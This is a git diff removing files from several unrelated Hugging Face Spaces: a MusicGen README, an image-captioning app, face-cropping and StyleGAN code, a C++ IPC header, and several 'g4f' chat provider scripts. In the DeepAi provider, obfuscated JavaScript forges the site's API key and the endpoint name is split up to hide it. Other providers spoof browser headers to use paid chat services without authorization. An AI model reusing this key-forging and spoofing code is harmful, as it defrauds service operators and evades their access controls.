this set to choose the next token. This approach ensures that the generated output maintains a balance between diversity and coherence, as it allows for a varying number of tokens to be considered based on their probabilities. - -Temperature: Temperature is a parameter that controls the randomness of the generated output. It is applied during the sampling process, where a higher temperature value results in more random and diverse outputs, while a lower temperature value leads to more deterministic and focused outputs. 
In the context of music generation, a higher temperature can introduce more variability and creativity into the generated music, but it may also lead to less coherent or structured compositions. On the other hand, a lower temperature can produce more repetitive and predictable music. - -Classifier-Free Guidance: Classifier-Free Guidance refers to a technique used in some music generation models where a separate classifier network is trained to provide guidance or control over the generated music. This classifier is trained on labeled data to recognize specific musical characteristics or styles. During the generation process, the output of the generator model is evaluated by the classifier, and the generator is encouraged to produce music that aligns with the desired characteristics or style. This approach allows for more fine-grained control over the generated music, enabling users to specify certain attributes they want the model to capture. - -These parameters, such as top-k, top-p, temperature, and classifier-free guidance, provide different ways to influence the output of a music generation model and strike a balance between creativity, diversity, coherence, and control. The specific values for these parameters can be tuned based on the desired outcome and user preferences. - -## API - -We provide a simple API and 4 pre-trained models. The pre trained models are: -- `small`: 300M model, text to music only - [🤗 Hub](https://huggingface.co/facebook/musicgen-small) -- `medium`: 1.5B model, text to music only - [🤗 Hub](https://huggingface.co/facebook/musicgen-medium) -- `melody`: 1.5B model, text to music and text+melody to music - [🤗 Hub](https://huggingface.co/facebook/musicgen-melody) -- `large`: 3.3B model, text to music only - [🤗 Hub](https://huggingface.co/facebook/musicgen-large) - -We observe the best trade-off between quality and compute with the `medium` or `melody` model. -In order to use MusicGen locally **you must have a GPU**. We recommend 16GB of memory, but smaller -GPUs will be able to generate short sequences, or longer sequences with the `small` model. - -**Note**: Please make sure to have [ffmpeg](https://ffmpeg.org/download.html) installed when using newer version of `torchaudio`. -You can install it with: -``` -apt-get install ffmpeg -``` - -See after a quick example for using the API. - -```python -import torchaudio -from audiocraft.models import MusicGen -from audiocraft.data.audio import audio_write - -model = MusicGen.get_pretrained('melody') -model.set_generation_params(duration=8) # generate 8 seconds. -wav = model.generate_unconditional(4) # generates 4 unconditional audio samples -descriptions = ['happy rock', 'energetic EDM', 'sad jazz'] -wav = model.generate(descriptions) # generates 3 samples. - -melody, sr = torchaudio.load('./assets/bach.mp3') -# generates using the melody from the given audio and the provided descriptions. -wav = model.generate_with_chroma(descriptions, melody[None].expand(3, -1, -1), sr) - -for idx, one_wav in enumerate(wav): - # Will save under {idx}.wav, with loudness normalization at -14 db LUFS. - audio_write(f'{idx}', one_wav.cpu(), model.sample_rate, strategy="loudness", loudness_compressor=True) -``` -## 🤗 Transformers Usage - -MusicGen is available in the 🤗 Transformers library from version 4.31.0 onwards, requiring minimal dependencies -and additional packages. Steps to get started: - -1. 
First install the 🤗 [Transformers library](https://github.com/huggingface/transformers) from main: - -``` -pip install git+https://github.com/huggingface/transformers.git -``` - -2. Run the following Python code to generate text-conditional audio samples: - -```py -from transformers import AutoProcessor, MusicgenForConditionalGeneration - - -processor = AutoProcessor.from_pretrained("facebook/musicgen-small") -model = MusicgenForConditionalGeneration.from_pretrained("facebook/musicgen-small") - -inputs = processor( - text=["80s pop track with bassy drums and synth", "90s rock song with loud guitars and heavy drums"], - padding=True, - return_tensors="pt", -) - -audio_values = model.generate(**inputs, max_new_tokens=256) -``` - -3. Listen to the audio samples either in an ipynb notebook: - -```py -from IPython.display import Audio - -sampling_rate = model.config.audio_encoder.sampling_rate -Audio(audio_values[0].numpy(), rate=sampling_rate) -``` - -Or save them as a `.wav` file using a third-party library, e.g. `scipy`: - -```py -import scipy - -sampling_rate = model.config.audio_encoder.sampling_rate -scipy.io.wavfile.write("musicgen_out.wav", rate=sampling_rate, data=audio_values[0, 0].numpy()) -``` - -For more details on using the MusicGen model for inference using the 🤗 Transformers library, refer to the -[MusicGen docs](https://huggingface.co/docs/transformers/main/en/model_doc/musicgen) or the hands-on -[Google Colab](https://colab.research.google.com/github/sanchit-gandhi/notebooks/blob/main/MusicGen.ipynb). - - -## Model Card - -See [the model card page](./MODEL_CARD.md). - -## FAQ - -#### Will the training code be released? - -Yes. We will soon release the training code for MusicGen and EnCodec. - - -#### I need help on Windows - -@FurkanGozukara made a complete tutorial for [Audiocraft/MusicGen on Windows](https://youtu.be/v-YpvPkhdO4) - -#### I need help for running the demo on Colab - -Check [@camenduru tutorial on Youtube](https://www.youtube.com/watch?v=EGfxuTy9Eeo). - -## Citation -``` -@article{copet2023simple, - title={Simple and Controllable Music Generation}, - author={Jade Copet and Felix Kreuk and Itai Gat and Tal Remez and David Kant and Gabriel Synnaeve and Yossi Adi and Alexandre Défossez}, - year={2023}, - journal={arXiv preprint arXiv:2306.05284}, -} -``` - -## License -* The code in this repository is released under the MIT license as found in the [LICENSE file](LICENSE). -* The weights in this repository are released under the CC-BY-NC 4.0 license as found in the [LICENSE_weights file](LICENSE_weights). 
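-
-## Appendix: sampling parameters in code
-
-As a rough, hypothetical sketch of the top-k / top-p / temperature parameters described in the "More info" section above (this is generic nucleus-sampling code, not Audiocraft's internals, and every name and default below is illustrative):
-
-```python
-import torch
-
-def sample_next_token(logits, top_k=250, top_p=0.0, temperature=1.0):
-    # logits: 1-D tensor of unnormalized scores for the next token
-    logits = logits / max(temperature, 1e-5)          # temperature scales randomness
-    if top_k > 0:
-        kth_best = torch.topk(logits, top_k).values[-1]
-        logits[logits < kth_best] = float("-inf")     # keep only the k most likely tokens
-    if top_p > 0.0:
-        probs, idx = torch.sort(torch.softmax(logits, -1), descending=True)
-        remove = torch.cumsum(probs, -1) > top_p
-        remove[1:] = remove[:-1].clone()              # keep the token that crosses p
-        remove[0] = False
-        logits[idx[remove]] = float("-inf")           # drop the tail outside the nucleus
-    return torch.multinomial(torch.softmax(logits, -1), num_samples=1)
-```
-
-Larger k, larger p, or a higher temperature all widen the pool of candidate tokens and trade coherence for diversity, as described above.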
-[arxiv]: https://arxiv.org/abs/2306.05284 -[musicgen_samples]: https://ai.honu.io/papers/musicgen/ \ No newline at end of file diff --git a/spaces/AchyuthGamer/OpenGPT-Chat-UI/src/lib/utils/sum.ts b/spaces/AchyuthGamer/OpenGPT-Chat-UI/src/lib/utils/sum.ts deleted file mode 100644 index 289b70584ef9f7795b1f4b1bf0151237dc2c55ff..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT-Chat-UI/src/lib/utils/sum.ts +++ /dev/null @@ -1,3 +0,0 @@ -export function sum(nums: number[]): number { - return nums.reduce((a, b) => a + b, 0); -} diff --git a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/DeepAi.py b/spaces/AchyuthGamer/OpenGPT/g4f/Provider/DeepAi.py deleted file mode 100644 index bac3e3fe64b34d9ce2e5465ff99e84c7b2cf5411..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/DeepAi.py +++ /dev/null @@ -1,77 +0,0 @@ -from __future__ import annotations - -import json -import js2py -import random -import hashlib -from aiohttp import ClientSession - -from ..typing import AsyncGenerator -from .base_provider import AsyncGeneratorProvider - - -class DeepAi(AsyncGeneratorProvider): - url: str = "https://deepai.org" - working = True - supports_gpt_35_turbo = True - - @staticmethod - async def create_async_generator( - model: str, - messages: list[dict[str, str]], - proxy: str = None, - **kwargs - ) -> AsyncGenerator: - - token_js = """ -var agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' -var a, b, c, d, e, h, f, l, g, k, m, n, r, x, C, E, N, F, T, O, P, w, D, G, Q, R, W, I, aa, fa, na, oa, ha, ba, X, ia, ja, ka, J, la, K, L, ca, S, U, M, ma, B, da, V, Y; -h = Math.round(1E11 * Math.random()) + ""; -f = function () { - for (var p = [], q = 0; 64 > q;) p[q] = 0 | 4294967296 * Math.sin(++q % Math.PI); - - return function (t) { - var v, y, H, ea = [v = 1732584193, y = 4023233417, ~v, ~y], - Z = [], - A = unescape(encodeURI(t)) + "\u0080", - z = A.length; - t = --z / 4 + 2 | 15; - for (Z[--t] = 8 * z; ~z;) Z[z >> 2] |= A.charCodeAt(z) << 8 * z--; - for (q = A = 0; q < t; q += 16) { - for (z = ea; 64 > A; z = [H = z[3], v + ((H = z[0] + [v & y | ~v & H, H & v | ~H & y, v ^ y ^ H, y ^ (v | ~H)][z = A >> 4] + p[A] + ~~Z[q | [A, 5 * A + 1, 3 * A + 5, 7 * A][z] & 15]) << (z = [7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21][4 * z + A++ % 4]) | H >>> -z), v, y]) v = z[1] | 0, y = z[2]; - for (A = 4; A;) ea[--A] += z[A] - } - for (t = ""; 32 > A;) t += (ea[A >> 3] >> 4 * (1 ^ A++) & 15).toString(16); - return t.split("").reverse().join("") - } -}(); - -"tryit-" + h + "-" + f(agent + f(agent + f(agent + h + "x"))); -""" - - payload = {"chat_style": "chat", "chatHistory": json.dumps(messages)} - api_key = js2py.eval_js(token_js) - headers = { - "api-key": api_key, - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36", - **kwargs.get("headers", {}) - } - async with ClientSession( - headers=headers - ) as session: - fill = "ing_is" - fill = f"ack{fill}_a_crim" - async with session.post(f"https://api.deepai.org/h{fill}e", proxy=proxy, data=payload) as response: - response.raise_for_status() - async for stream in response.content.iter_any(): - if stream: - yield stream.decode() - - -def get_api_key(user_agent: str): - e = str(round(1E11 * random.random())) - - def hash(data: str): - return hashlib.md5(data.encode()).hexdigest()[::-1] - - return f"tryit-{e}-" + hash(user_agent + hash(user_agent + 
hash(user_agent + e + "x"))) \ No newline at end of file diff --git a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/ChatFree.py b/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/ChatFree.py deleted file mode 100644 index 6bbaebaed35681026ff1eeb8eee3270e3b0741fd..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/ChatFree.py +++ /dev/null @@ -1,48 +0,0 @@ -import os, requests -from ...typing import sha256, Dict, get_type_hints -import json - -url = "https://v.chatfree.cc" -model = ['gpt-3.5-turbo', 'gpt-3.5-turbo-16k'] -supports_stream = False -needs_auth = False - - -def _create_completion(model: str, messages: list, stream: bool, **kwargs): - headers = { - 'authority': 'chat.dfehub.com', - 'accept': '*/*', - 'accept-language': 'en,fr-FR;q=0.9,fr;q=0.8,es-ES;q=0.7,es;q=0.6,en-US;q=0.5,am;q=0.4,de;q=0.3', - 'content-type': 'application/json', - 'origin': 'https://v.chatfree.cc', - 'referer': 'https://v.chatfree.cc/', - 'sec-ch-ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"', - 'sec-ch-ua-mobile': '?0', - 'sec-ch-ua-platform': '"macOS"', - 'sec-fetch-dest': 'empty', - 'sec-fetch-mode': 'cors', - 'sec-fetch-site': 'same-origin', - 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', - 'x-requested-with': 'XMLHttpRequest', - } - - json_data = { - 'messages': messages, - 'stream': True, - 'model': model, - 'temperature': 0.5, - 'presence_penalty': 0, - 'frequency_penalty': 0, - 'top_p': 1, - } - - response = requests.post('https://v.chatfree.cc/api/openai/v1/chat/completions', - headers=headers, json=json_data) - - for chunk in response.iter_lines(): - if b'content' in chunk: - data = json.loads(chunk.decode().split('data: ')[1]) - yield (data['choices'][0]['delta']['content']) - -params = f'g4f.Providers.{os.path.basename(__file__)[:-3]} supports: ' + \ - '(%s)' % ', '.join([f"{name}: {get_type_hints(_create_completion)[name].__name__}" for name in _create_completion.__code__.co_varnames[:_create_completion.__code__.co_argcount]]) \ No newline at end of file diff --git a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/Ezcht.py b/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/Ezcht.py deleted file mode 100644 index baec214f7e0e936ea06bffa357e1bd2b77cd4089..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/Ezcht.py +++ /dev/null @@ -1,35 +0,0 @@ -import requests -import os -import json -from ...typing import sha256, Dict, get_type_hints - -url = 'https://gpt4.ezchat.top' -model = ['gpt-3.5-turbo', 'gpt-3.5-turbo-16k', 'gpt-3.5-turbo-16k-0613', 'gpt-3.5-turbo-0613'] -supports_stream = True -needs_auth = False - -def _create_completion(model: str, messages: list, stream: bool, temperature: float = 0.7, **kwargs): - headers = { - 'Content-Type': 'application/json', - } - data = { - 'model': model, - 'temperature': 0.7, - 'presence_penalty': 0, - 'messages': messages, - } - response = requests.post(url + '/api/openai/v1/chat/completions', - json=data, stream=True) - - if stream: - for chunk in response.iter_content(chunk_size=None): - chunk = chunk.decode('utf-8') - if chunk.strip(): - message = json.loads(chunk)['choices'][0]['message']['content'] - yield message - else: - message = response.json()['choices'][0]['message']['content'] - yield message - -params = f'g4f.Providers.{os.path.basename(__file__)[:-3]} supports: ' + \ - '(%s)' % ', '.join([f"{name}: 
{get_type_hints(_create_completion)[name].__name__}" for name in _create_completion.__code__.co_varnames[:_create_completion.__code__.co_argcount]]) \ No newline at end of file diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/los/Factory.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/los/Factory.js deleted file mode 100644 index 92ec48bc7c36d6c3bbc482e7159b653f7d2ff8c6..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/los/Factory.js +++ /dev/null @@ -1,13 +0,0 @@ -import Los from './Los.js'; -import ObjectFactory from '../ObjectFactory.js'; -import SetValue from '../../../plugins/utils/object/SetValue.js'; - -ObjectFactory.register('los', function (config) { - var gameObject = new Los(this.scene, config); - this.scene.add.existing(gameObject); - return gameObject; -}); - -SetValue(window, 'RexPlugins.Spinner.Los', Los); - -export default Los; \ No newline at end of file diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/orbit/Factory.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/orbit/Factory.js deleted file mode 100644 index f182c5c5b04cd0fcbc25acb052d253e1fc0a8e5d..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/orbit/Factory.js +++ /dev/null @@ -1,13 +0,0 @@ -import Orbit from './Orbit.js'; -import ObjectFactory from '../ObjectFactory.js'; -import SetValue from '../../../plugins/utils/object/SetValue.js'; - -ObjectFactory.register('orbit', function (config) { - var gameObject = new Orbit(this.scene, config); - this.scene.add.existing(gameObject); - return gameObject; -}); - -SetValue(window, 'RexPlugins.Spinner.Orbit', Orbit); - -export default Orbit; \ No newline at end of file diff --git a/spaces/AlexWortega/ruImageCaptionong/app.py b/spaces/AlexWortega/ruImageCaptionong/app.py deleted file mode 100644 index f82d06d98568e5ab1fbff5f47620d4a989212e3e..0000000000000000000000000000000000000000 --- a/spaces/AlexWortega/ruImageCaptionong/app.py +++ /dev/null @@ -1,198 +0,0 @@ -import torch - - -import sys - - -import gradio as gr - -from PIL import Image - -device = 'cpu' -import clip -import os -from torch import nn -import numpy as np -import torch -import torch.nn.functional as nnf -import sys -from transformers import GPT2Tokenizer, GPT2LMHeadModel -from tqdm import tqdm, trange -import PIL.Image -#ggf - -import transformers - -device = 'cuda' if torch.cuda.is_available() else 'cpu' - -model_path = 'coco_prefix_latest.pt' - - - - - -class MLP(nn.Module): - - def forward(self, x): - return self.model(x) - - def __init__(self, sizes, bias=True, act=nn.Tanh): - super(MLP, self).__init__() - layers = [] - for i in range(len(sizes) -1): - layers.append(nn.Linear(sizes[i], sizes[i + 1], bias=bias)) - if i < len(sizes) - 2: - layers.append(act()) - self.model = nn.Sequential(*layers) - - -class ClipCaptionModel(nn.Module): - - #@functools.lru_cache #FIXME - def get_dummy_token(self, batch_size, device): - return torch.zeros(batch_size, self.prefix_length, dtype=torch.int64, device=device) - - def forward(self, tokens, prefix, mask, labels): - embedding_text = self.gpt.transformer.wte(tokens) - prefix_projections = self.clip_project(prefix).view(-1, self.prefix_length, self.gpt_embedding_size) - #print(embedding_text.size()) #torch.Size([5, 67, 768]) - #print(prefix_projections.size()) #torch.Size([5, 1, 768]) - 
embedding_cat = torch.cat((prefix_projections, embedding_text), dim=1) - if labels is not None: - dummy_token = self.get_dummy_token(tokens.shape[0], tokens.device) - labels = torch.cat((dummy_token, tokens), dim=1) - out = self.gpt(inputs_embeds=embedding_cat, labels=labels, attention_mask=mask) - return out - - def __init__(self, prefix_length, prefix_size: int = 512): - super(ClipCaptionModel, self).__init__() - self.prefix_length = prefix_length - - self.gpt = GPT2LMHeadModel.from_pretrained('sberbank-ai/rugpt3small_based_on_gpt2') - - self.gpt_embedding_size = self.gpt.transformer.wte.weight.shape[1] - if prefix_length > 10: # not enough memory - self.clip_project = nn.Linear(prefix_size, self.gpt_embedding_size * prefix_length) - else: - self.clip_project = MLP((prefix_size, (self.gpt_embedding_size * prefix_length) // 2, self.gpt_embedding_size * prefix_length)) - - -class ClipCaptionPrefix(ClipCaptionModel): - - def parameters(self, recurse: bool = True): - return self.clip_project.parameters() - - def train(self, mode: bool = True): - super(ClipCaptionPrefix, self).train(mode) - self.gpt.eval() - return self - - - -clip_model, preprocess = clip.load("ViT-B/32", device=device, jit=False) -tokenizer = GPT2Tokenizer.from_pretrained('sberbank-ai/rugpt3small_based_on_gpt2') -prefix_length = 10 -model = ClipCaptionModel(prefix_length) -model.load_state_dict(torch.load(model_path, map_location='cpu')) -model.to(device) -def generate2( - model, - tokenizer, - tokens=None, - prompt=None, - embed=None, - entry_count=1, - entry_length=67, - top_p=0.98, - temperature=1., - stop_token = '.', -): - model.eval() - generated_num = 0 - generated_list = [] - stop_token_index = tokenizer.encode(stop_token)[0] - filter_value = -float("Inf") - device = next(model.parameters()).device - - with torch.no_grad(): - - for entry_idx in trange(entry_count): - if embed is not None: - generated = embed - else: - if tokens is None: - tokens = torch.tensor(tokenizer.encode(prompt)) - tokens = tokens.unsqueeze(0).to(device) - - generated = model.gpt.transformer.wte(tokens) - - for i in range(entry_length): - - outputs = model.gpt(inputs_embeds=generated) - logits = outputs.logits - logits = logits[:, -1, :] / (temperature if temperature > 0 else 1.0) - sorted_logits, sorted_indices = torch.sort(logits, descending=True) - cumulative_probs = torch.cumsum(nnf.softmax(sorted_logits, dim=-1), dim=-1) - sorted_indices_to_remove = cumulative_probs > top_p - sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[ - ..., :-1 - ].clone() - sorted_indices_to_remove[..., 0] = 0 - - indices_to_remove = sorted_indices[sorted_indices_to_remove] - logits[:, indices_to_remove] = filter_value - # - top_k = 2000 - top_p = 0.98 - #print(logits) - #next_token = transformers.top_k_top_p_filtering(logits.to(torch.int64).unsqueeze(0), top_k=top_k, top_p=top_p) - next_token = torch.argmax(logits, -1).unsqueeze(0) - next_token_embed = model.gpt.transformer.wte(next_token) - - if tokens is None: - tokens = next_token - else: - tokens = torch.cat((tokens, next_token), dim=1) - generated = torch.cat((generated, next_token_embed), dim=1) - - if stop_token_index == next_token.item(): - break - - output_list = list(tokens.squeeze().cpu().numpy()) - output_text = tokenizer.decode(output_list) - generated_list.append(output_text) - - return generated_list[0] - - - -def _to_caption(pil_image): - - image = preprocess(pil_image).unsqueeze(0).to(device) - with torch.no_grad(): - - prefix = clip_model.encode_image(image).to(device, 
dtype=torch.float32) - prefix_embed = model.clip_project(prefix).reshape(1, prefix_length, -1) - - generated_text_prefix = generate2(model, tokenizer, embed=prefix_embed) - return generated_text_prefix - - - -def classify_image(inp): - print(type(inp)) - inp = Image.fromarray(inp) - texts = _to_caption(inp) - - print(texts) - - - return texts - -image = gr.inputs.Image(shape=(256, 256)) -label = gr.outputs.Label(num_top_classes=3) - - -iface = gr.Interface(fn=classify_image, description="https://github.com/AlexWortega/ruImageCaptioning RuImage Captioning trained for a image2text task to predict caption of image by https://t.me/lovedeathtransformers Alex Wortega", inputs=image, outputs="text",examples=[ - ['1.jpeg']]) -iface.launch() \ No newline at end of file diff --git a/spaces/Alpaca233/SadTalker/src/utils/croper.py b/spaces/Alpaca233/SadTalker/src/utils/croper.py deleted file mode 100644 index 3d9a0ac58f97afdc95d40f2a400272b11fe38093..0000000000000000000000000000000000000000 --- a/spaces/Alpaca233/SadTalker/src/utils/croper.py +++ /dev/null @@ -1,144 +0,0 @@ -import os -import cv2 -import time -import glob -import argparse -import scipy -import numpy as np -from PIL import Image -import torch -from tqdm import tqdm -from itertools import cycle - -from src.face3d.extract_kp_videos_safe import KeypointExtractor -from facexlib.alignment import landmark_98_to_68 - -import numpy as np -from PIL import Image - -class Preprocesser: - def __init__(self, device='cuda'): - self.predictor = KeypointExtractor(device) - - def get_landmark(self, img_np): - """get landmark with dlib - :return: np.array shape=(68, 2) - """ - with torch.no_grad(): - dets = self.predictor.det_net.detect_faces(img_np, 0.97) - - if len(dets) == 0: - return None - det = dets[0] - - img = img_np[int(det[1]):int(det[3]), int(det[0]):int(det[2]), :] - lm = landmark_98_to_68(self.predictor.detector.get_landmarks(img)) # [0] - - #### keypoints to the original location - lm[:,0] += int(det[0]) - lm[:,1] += int(det[1]) - - return lm - - def align_face(self, img, lm, output_size=1024): - """ - :param filepath: str - :return: PIL Image - """ - lm_chin = lm[0: 17] # left-right - lm_eyebrow_left = lm[17: 22] # left-right - lm_eyebrow_right = lm[22: 27] # left-right - lm_nose = lm[27: 31] # top-down - lm_nostrils = lm[31: 36] # top-down - lm_eye_left = lm[36: 42] # left-clockwise - lm_eye_right = lm[42: 48] # left-clockwise - lm_mouth_outer = lm[48: 60] # left-clockwise - lm_mouth_inner = lm[60: 68] # left-clockwise - - # Calculate auxiliary vectors. - eye_left = np.mean(lm_eye_left, axis=0) - eye_right = np.mean(lm_eye_right, axis=0) - eye_avg = (eye_left + eye_right) * 0.5 - eye_to_eye = eye_right - eye_left - mouth_left = lm_mouth_outer[0] - mouth_right = lm_mouth_outer[6] - mouth_avg = (mouth_left + mouth_right) * 0.5 - eye_to_mouth = mouth_avg - eye_avg - - # Choose oriented crop rectangle. - x = eye_to_eye - np.flipud(eye_to_mouth) * [-1, 1] # Addition of binocular difference and double mouth difference - x /= np.hypot(*x) # hypot函数计算直角三角形的斜边长,用斜边长对三角形两条直边做归一化 - x *= max(np.hypot(*eye_to_eye) * 2.0, np.hypot(*eye_to_mouth) * 1.8) # 双眼差和眼嘴差,选较大的作为基准尺度 - y = np.flipud(x) * [-1, 1] - c = eye_avg + eye_to_mouth * 0.1 - quad = np.stack([c - x - y, c - x + y, c + x + y, c + x - y]) # 定义四边形,以面部基准位置为中心上下左右平移得到四个顶点 - qsize = np.hypot(*x) * 2 # 定义四边形的大小(边长),为基准尺度的2倍 - - # Shrink. 
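-        # If the computed quad is much larger than the requested output size, downscale the
-        # whole source image first so the later crop and pad steps work on fewer pixels.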
- # 如果计算出的四边形太大了,就按比例缩小它 - shrink = int(np.floor(qsize / output_size * 0.5)) - if shrink > 1: - rsize = (int(np.rint(float(img.size[0]) / shrink)), int(np.rint(float(img.size[1]) / shrink))) - img = img.resize(rsize, Image.ANTIALIAS) - quad /= shrink - qsize /= shrink - else: - rsize = (int(np.rint(float(img.size[0]))), int(np.rint(float(img.size[1])))) - - # Crop. - border = max(int(np.rint(qsize * 0.1)), 3) - crop = (int(np.floor(min(quad[:, 0]))), int(np.floor(min(quad[:, 1]))), int(np.ceil(max(quad[:, 0]))), - int(np.ceil(max(quad[:, 1])))) - crop = (max(crop[0] - border, 0), max(crop[1] - border, 0), min(crop[2] + border, img.size[0]), - min(crop[3] + border, img.size[1])) - if crop[2] - crop[0] < img.size[0] or crop[3] - crop[1] < img.size[1]: - # img = img.crop(crop) - quad -= crop[0:2] - - # Pad. - pad = (int(np.floor(min(quad[:, 0]))), int(np.floor(min(quad[:, 1]))), int(np.ceil(max(quad[:, 0]))), - int(np.ceil(max(quad[:, 1])))) - pad = (max(-pad[0] + border, 0), max(-pad[1] + border, 0), max(pad[2] - img.size[0] + border, 0), - max(pad[3] - img.size[1] + border, 0)) - # if enable_padding and max(pad) > border - 4: - # pad = np.maximum(pad, int(np.rint(qsize * 0.3))) - # img = np.pad(np.float32(img), ((pad[1], pad[3]), (pad[0], pad[2]), (0, 0)), 'reflect') - # h, w, _ = img.shape - # y, x, _ = np.ogrid[:h, :w, :1] - # mask = np.maximum(1.0 - np.minimum(np.float32(x) / pad[0], np.float32(w - 1 - x) / pad[2]), - # 1.0 - np.minimum(np.float32(y) / pad[1], np.float32(h - 1 - y) / pad[3])) - # blur = qsize * 0.02 - # img += (scipy.ndimage.gaussian_filter(img, [blur, blur, 0]) - img) * np.clip(mask * 3.0 + 1.0, 0.0, 1.0) - # img += (np.median(img, axis=(0, 1)) - img) * np.clip(mask, 0.0, 1.0) - # img = Image.fromarray(np.uint8(np.clip(np.rint(img), 0, 255)), 'RGB') - # quad += pad[:2] - - # Transform. - quad = (quad + 0.5).flatten() - lx = max(min(quad[0], quad[2]), 0) - ly = max(min(quad[1], quad[7]), 0) - rx = min(max(quad[4], quad[6]), img.size[0]) - ry = min(max(quad[3], quad[5]), img.size[0]) - - # Save aligned image. 
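-        # rsize: (w, h) the source is resized to; crop: coarse (left, top, right, bottom)
-        # face box in the resized image; the final list: a tighter quad box inside that crop.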
- return rsize, crop, [lx, ly, rx, ry] - - def crop(self, img_np_list, still=False, xsize=512): # first frame for all video - img_np = img_np_list[0] - lm = self.get_landmark(img_np) - - if lm is None: - raise 'can not detect the landmark from source image' - rsize, crop, quad = self.align_face(img=Image.fromarray(img_np), lm=lm, output_size=xsize) - clx, cly, crx, cry = crop - lx, ly, rx, ry = quad - lx, ly, rx, ry = int(lx), int(ly), int(rx), int(ry) - for _i in range(len(img_np_list)): - _inp = img_np_list[_i] - _inp = cv2.resize(_inp, (rsize[0], rsize[1])) - _inp = _inp[cly:cry, clx:crx] - if not still: - _inp = _inp[ly:ry, lx:rx] - img_np_list[_i] = _inp - return img_np_list, crop, quad - diff --git a/spaces/Ameaou/academic-chatgpt3.1/crazy_functions/test_project/cpp/cppipc/waiter.h b/spaces/Ameaou/academic-chatgpt3.1/crazy_functions/test_project/cpp/cppipc/waiter.h deleted file mode 100644 index ee45fe3517be95ac1688a3e3540189edeb0d860c..0000000000000000000000000000000000000000 --- a/spaces/Ameaou/academic-chatgpt3.1/crazy_functions/test_project/cpp/cppipc/waiter.h +++ /dev/null @@ -1,83 +0,0 @@ -#pragma once - -#include -#include -#include -#include - -#include "libipc/def.h" -#include "libipc/mutex.h" -#include "libipc/condition.h" -#include "libipc/platform/detail.h" - -namespace ipc { -namespace detail { - -class waiter { - ipc::sync::condition cond_; - ipc::sync::mutex lock_; - std::atomic quit_ {false}; - -public: - static void init(); - - waiter() = default; - waiter(char const *name) { - open(name); - } - - ~waiter() { - close(); - } - - bool valid() const noexcept { - return cond_.valid() && lock_.valid(); - } - - bool open(char const *name) noexcept { - quit_.store(false, std::memory_order_relaxed); - if (!cond_.open((std::string{"_waiter_cond_"} + name).c_str())) { - return false; - } - if (!lock_.open((std::string{"_waiter_lock_"} + name).c_str())) { - cond_.close(); - return false; - } - return valid(); - } - - void close() noexcept { - cond_.close(); - lock_.close(); - } - - template - bool wait_if(F &&pred, std::uint64_t tm = ipc::invalid_value) noexcept { - IPC_UNUSED_ std::lock_guard guard {lock_}; - while ([this, &pred] { - return !quit_.load(std::memory_order_relaxed) - && std::forward(pred)(); - }()) { - if (!cond_.wait(lock_, tm)) return false; - } - return true; - } - - bool notify() noexcept { - std::lock_guard{lock_}; // barrier - return cond_.notify(lock_); - } - - bool broadcast() noexcept { - std::lock_guard{lock_}; // barrier - return cond_.broadcast(lock_); - } - - bool quit_waiting() { - quit_.store(true, std::memory_order_release); - return broadcast(); - } -}; - -} // namespace detail -} // namespace ipc diff --git a/spaces/Amrrs/DragGan-Inversion/stylegan_human/training/networks_stylegan2.py b/spaces/Amrrs/DragGan-Inversion/stylegan_human/training/networks_stylegan2.py deleted file mode 100644 index 923f150ef7352ed85b4be2ff8d9f8a6193aac1e9..0000000000000000000000000000000000000000 --- a/spaces/Amrrs/DragGan-Inversion/stylegan_human/training/networks_stylegan2.py +++ /dev/null @@ -1,974 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. 
- -"""Network architectures from the paper -"Analyzing and Improving the Image Quality of StyleGAN". -Matches the original implementation of configs E-F by Karras et al. at -https://github.com/NVlabs/stylegan2/blob/master/training/networks_stylegan2.py""" - -import numpy as np -import torch -import torch.nn.functional as F -from torch_utils import misc -from torch_utils import persistence -from torch_utils.ops import conv2d_resample -from torch_utils.ops import upfirdn2d -from torch_utils.ops import bias_act -from torch_utils.ops import fma - -# ---------------------------------------------------------------------------- - - -@misc.profiled_function -def normalize_2nd_moment(x, dim=1, eps=1e-8): - return x * (x.square().mean(dim=dim, keepdim=True) + eps).rsqrt() - -# ---------------------------------------------------------------------------- - - -@misc.profiled_function -def modulated_conv2d( - # Input tensor of shape [batch_size, in_channels, in_height, in_width]. - x, - # Weight tensor of shape [out_channels, in_channels, kernel_height, kernel_width]. - weight, - # Modulation coefficients of shape [batch_size, in_channels]. - styles, - 